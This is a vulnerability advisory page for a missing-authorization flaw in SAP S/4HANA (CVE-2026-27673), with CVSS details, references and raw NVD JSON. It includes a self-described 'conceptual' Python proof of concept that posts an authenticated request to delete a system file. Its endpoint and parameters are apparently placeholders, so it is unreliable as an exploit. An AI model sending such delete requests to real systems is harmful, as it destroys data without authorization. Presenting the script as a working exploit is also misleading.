CVE-2026-27673

Description

Due to a missing authorization check, SAP S/4HANA (Private Cloud and On-Premise) allows an authenticated user to delete files on the operating system and gain unauthorized control over file operations which could leads to no impact on Confidentiality, Low impact on Integrity and Availability of the application.

CVSS Details

CVSS Score

4.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

SAP S/4HANA (Private Cloud and On-Premise)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# This is a conceptual Proof of Concept (PoC) for CVE-2026-27673.
# It demonstrates how an authenticated attacker might exploit missing authorization checks.

TARGET_URL = "https://target-sap-system.com:44300/sap/bc/webdynpro_abap/some_file_handler"
SESSION_COOKIE = "sap-usercontext=...; MYSAPSSO2=..." # Valid authenticated session cookie

headers = {
    "Cookie": SESSION_COOKIE,
    "User-Agent": "Mozilla/5.0 (PoC-Scanner)",
    "Content-Type": "application/x-www-form-urlencoded"
}

# Payload attempting to delete a critical file on the OS
data = {
    "file_path": "/usr/sap/SYS/global/important_config.xml",
    "action": "delete"
}

try:
    response = requests.post(TARGET_URL, headers=headers, data=data, verify=False)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if file was deleted.")
        print("[+] Response:", response.text)
    else:
        print("[-] Request failed with status code:", response.status_code)
except Exception as e:
    print("[!] Error:", str(e))

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27673
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27673
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27673/
[4] VulDB https://vuldb.com/cve/CVE-2026-27673
[5] https://me.sap.com/notes/3703813
[6] https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27673", "sourceIdentifier": "[email protected]", "published": "2026-04-14T00:16:05.477", "lastModified": "2026-04-17T15:18:16.507", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Due to a missing authorization check, SAP S/4HANA (Private Cloud and On-Premise) allows an authenticated user to delete files on the operating system and gain unauthorized control over file operations which could leads to no impact on Confidentiality, Low impact on Integrity and Availability of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:L", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://me.sap.com/notes/3703813", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}